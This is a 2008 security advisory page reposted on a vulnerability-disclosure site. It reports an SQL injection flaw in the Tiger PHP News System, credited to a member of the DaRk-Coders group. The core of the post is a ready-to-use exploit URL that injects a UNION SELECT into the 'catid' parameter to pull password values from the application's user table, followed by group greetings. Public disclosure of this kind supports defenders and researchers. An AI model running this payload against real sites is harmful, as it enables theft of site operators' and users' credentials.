Computer Security

Security Advisory: Tiger PHP News System SQL Injection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [ GLSA 200801-10 ] TikiWiki: Multiple vulnerabilities

  Woltlab Burning Board 2.3.6 PL2 Remote Delete Thread XSRF Vulnerability

  Web Wiz Rich Text Editor Directory traversal + HTM/HTML file creation on the server

  Web Wiz NewsPad Directory traversal

From:0in.email_(at)_gmail.com <0in.email_(at)_gmail.com>
Date:24.01.2008
Subject:Tiger PHP News System SQL Injection

/*
*Tiger PHP News System SQL Injection
*Bug found bY 0in from DaRk-Coders Group!
*Homepage: http://dark-coders.4rh.eu or http://dark-coders.prv.pl
*IRC:#dark-coders at irc.freenode.org
*Email: 0in(dot)email(at)gmail(dot)com
*/

Script home: http://tpns.k-na.se/
Exploit: http://localhost/?page=newscat&catid=-
666%20union%20select%20passwd%20from%20user

Greetings to:All Dark-Coders Team Members - Die-Angel,m4r1usz,suN8Hclf,Djlinux,
Aristo89
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server